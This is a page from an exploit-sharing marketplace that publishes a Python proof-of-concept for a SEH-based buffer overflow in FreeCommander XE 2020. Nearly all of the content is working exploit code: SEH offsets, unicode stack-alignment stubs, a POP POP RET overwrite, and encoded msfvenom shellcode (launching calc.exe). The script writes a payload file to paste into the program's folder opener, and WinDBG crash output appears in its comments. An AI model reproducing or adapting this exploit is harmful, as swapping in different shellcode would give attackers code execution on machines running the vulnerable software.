0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FreeCommander XE 2020 Pathname Buffer Overflow Exploit
[#!/usr/bin/python
# Exploit Title: FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)
# Version: Build 810a 32-bit
# Software Link: https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win8.1 x64 - Build 9600
# Description:
# - Exploits the command / folder opener in the main window by entering an overly string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (SEH overflown).
# - Some stack alignment was required, which eventually led to the ability of running shellcode.
# Reproduction:
# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander
# - Check results
# WinDBG initial crash output:
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe -
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
# eip=00410041 esp=00091620 ebp=00091640 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# FreeCommander+0x10041:
# 00410041 0064005c add byte ptr [eax+eax+5Ch],ah ds:002b:0000005c=??
import sys, struct
# Filename
filename = "win8_freecommander_poc.txt"
# Maximum length
maxlen = 2000
# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax
# Payload size: 512 bytes
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlzHTBypkPm0aP2ixep190bDTKnpP0bk0RJl4Kobn44KbRKxjoFW0Jo6p1KODlml1Q3LlBNLKpy1XOLMm1UwgrzR1Br7tKobzp2k0JmlDKNlJq2XySPHzaHQR1bkaImPIqWc2k0In8jCmjMyRknT2kzaZ6maIo4leq6ozmm1i7NX7pPul6JccMzXmk3MKtSEhdnxTKb8ldza6srFBklLPKbkqHMLKQhSbkM4dKIqVp1ymtmTldokokQQaIoj21yoK01OOoPZDKzrxkDM1MaZZa4M55UbM0ipkPr0S8nQRkROu7KOWeukHpTuFB1F2HvFBuWMuMio6umlM6CLZjQpIk7pRUlEWKa7mCsBrO1ZypR3ioxU0cS12LosnNpet80eM0AA"
)
# Offsets
seh = 522
nseh = seh - 2
# Venetian NOP
nop = "\x45"
# Aligning EBP with buffer
# ESP being closest to buffer
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b
align_esp = ( "\x54" # PUSH ESP
+ nop + # Padding
"\x58" # POP EAX
+ nop + # Padding
"\x05\x11\x11" # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --\
+ nop + # Padding |--> Adds 0x0f00 bytes
"\x2d\x02\x11" # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/
+ nop + # Padding
"\x40" # INC EAX # Added due to one-off unicode byte
+ nop + # Padding
"\x50" # PUSH EAX
+ nop + # Padding
"\xc3" # RET
)
# Prefix
prefix = "A" * seh # Fill junk
# NSEH/SEH
nseh = "\x41\x45" # NOP --> INC ECX # ADD [EBP], AL
seh = "\x71\x4c" # POP POP RET
# Suffix
suffix = nop * 3 # Align
suffix += align_esp # Align registers; EAX for executing shellcode
suffix += nop * 48 # Nopping until buffer
suffix += shellcode # Do some magic
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Fill junk
# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together
try:
file = open(filename,"wb")
file.write(payload)
file.close()
print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"
except:
print "[!] Error creating file!"
sys.exit(0)
# 0day.today [2024-09-28] #